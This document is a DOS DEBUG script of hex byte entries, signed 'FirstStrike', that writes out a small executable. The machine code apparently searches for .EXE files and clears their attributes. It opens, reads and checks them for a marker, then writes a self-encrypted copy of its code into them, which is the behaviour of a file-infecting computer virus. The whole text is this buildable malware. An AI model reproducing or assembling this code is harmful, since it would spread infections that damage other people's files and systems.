E 05B0 E4 42 00 B6 86 C2 E8 E0 D0 D2 E6 D0 BA 00 8C D2 
E 05C0 E4 E6 E8 A6 E8 E4 D2 D6 CA 00 96 E4 C2 CC E8 42 
E 05D0 00 07 85 02 A0 63 12 A7 D1 A7 95 F3 26 A1 B0 01 
E 05E0 C9 02 13 2C F2 02 47 EE 02 B6 87 0C 66 81 1D 81 
E 05F0 4C 07 7C 19 02 80 EA 06 D3 03 00 71 42 6A 9B 42 
E 0600 5C 13 3D E2 02 5C 19 0D E6 02 3C 69 A4 9B 42 4C 
E 0610 1D BE FD 66 ED 01 7C 00 00 9A EA 16 19 B1 06 0C 
E 0620 06 00 80 1D B1 D7 DD 01 7C 00 00 B4 EA 1A 8D 0C 
E 0630 00 00 9A 07 5C 06 00 42 21 D7 C3 8D 0C 00 00 B4 
E 0640 8F 0C 02 00 10 00 8F 0C 06 00 42 00 3C B0 80 A0 
E 0650 0E 77 00 00 06 BB 73 7B 04 AA 7B 00 00 5C 15 2E 
E 0660 4C 11 AC 00 8A 86 C5 EB BA 71 C6 4A 75 80 00 9B 
E 0670 42 71 42 4A 75 1B 02 0C 3E 9B 42 3E 0E 19 81 0A 
E 0680 20 00 5C 02 0D CA 02 F5 5C 06 0D D2 02 1D A1 5C 
E 0690 17 4D CE 02 F7 66 81 66 DB EA 00 01 10 00 00 01 
E 06A0 00 00 20 00 21 1A A5 9D 9E 10 1C 01 4D 5A F4 00 
E 06B0 04 00 00 00 20 00 00 00 FF FF 23 00 00 A0 00 00 
E 06C0 07 00 23 00 3D 00 4B 74 05 2E FF 2E 71 01 E8 02 
E 06D0 00 EB F6 50 53 51 06 52 1E B9 40 00 8B DA 80 3F 
E 06E0 2E 74 06 43 E2 F8 E9 C5 00 80 7F 01 45 75 F7 80 
E 06F0 7F 02 58 75 F1 80 7F 03 45 75 EB B8 00 43 E8 BF 
E 0700 00 2E 89 0E 6B 01 B8 01 43 33 C9 E8 B2 00 B8 02 
E 0710 3D E8 AC 00 93 B8 00 57 E8 A5 00 2E 89 0E 6F 01 
E 0720 2E 89 16 6D 01 0E 1F B4 3F B9 18 00 BA 75 01 E8 
E 0730 8E 00 2E 81 3E 87 01 93 19 75 03 EB 6C 90 E8 A3 
E 0740 00 50 52 E8 81 00 5A 58 E8 0D FE 53 51 52 BB 21 
E 0750 00 B9 41 01 2E 8A 17 D0 C2 2E 88 17 43 E2 F5 5A 
E 0760 59 5B B4 40 B9 BD 02 BA 00 00 E8 53 00 53 51 52 
E 0770 BB 21 00 B9 41 01 2E 8A 17 D0 CA 2E 88 17 43 E2 
E 0780 F5 5A 59 5B 2E C7 06 87 01 93 19 E8 5B 00 B4 40 
E 0790 B9 18 00 BA 75 01 E8 27 00 B8 01 57 2E 8B 0E 6F 
E 07A0 01 2E 8B 16 6D 01 E8 17 00 B4 3E E8 12 00 1F 5A 
E 07B0 B8 01 43 2E 8B 0E 6B 01 E8 05 00 07 59 5B 58 C3 
E 07C0 9C 2E FF 1E 71 01 C3 2E C4 06 89 01 2E A3 63 01 
E 07D0 2E 8C 06 65 01 2E C4 06 83 01 2E 8C 06 67 01 2E 
E 07E0 A3 69 01 C3 B8 02 42 EB 03 B8 00 42 33 D2 33 C9 
E 07F0 E8 CD FF C3 
RCX
06F4
W
Q



                             -+- FirstStrike -+-